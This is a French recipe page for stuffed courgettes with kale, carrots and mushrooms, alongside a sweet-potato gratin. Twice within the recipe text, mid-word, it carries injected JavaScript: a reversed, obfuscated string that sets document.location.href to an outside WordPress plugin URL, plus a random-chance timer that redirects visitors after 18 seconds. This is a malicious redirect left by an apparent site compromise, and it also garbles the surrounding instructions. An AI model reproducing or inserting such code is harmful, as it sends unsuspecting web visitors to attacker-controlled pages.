COURGETTES FARCIES ET GRATIN DAUPHINOIS DE PATATES DOUCES

COURGETTES FARCIES ET GRATIN DAUPHINOIS DE PATATES DOUCES

Pour 4 Pers.

INGRÉDIENTS :

– 2 courgettes
– 1 barquette de champignons
– 2 carottes
– Une botte de Kale (ou épinards)
– 1 oignon rouge
– 1 gousse d’ail
– 1CS huile de coco
– coriandre (facultatif)
– 1 peu de parmesan pour gratiner
– 2 grosses patates douces
– 250ml crème liquide
– sel/poivre

Couper les courgettes en 2 dans le sens de la longueur. Les évider et garder la chair.


Cuire les courgettes au micro-onde pendant 6 minutes avec un fond d’eau et du sel dans un plat adapté.


Émincer toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les légumes (sauf la patate douce) et cuire rapidement au wok avec l’huile de coco jusqu’à ce que les carottes soient tendres. Assaisonner.


Égoutter puis farcir les courgettes avec les légumes et râper un peu de parmesan dessus.


Faire gratiner au four en position grill.


Pour le gratin : Couper les patates douces en rondelles, les saler, poivrer, les mettre dans un plat à gratin, recouvrir de crème et enfourner 1h00-1h15 à 180 degrés (recouvrir d’une feuille d’aluminium pour que le dessus du gratin ne brûle pas).


NB : On peut rajouter un peu de sésame noir pour servir en déco (voir photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to)


Bon appétit !

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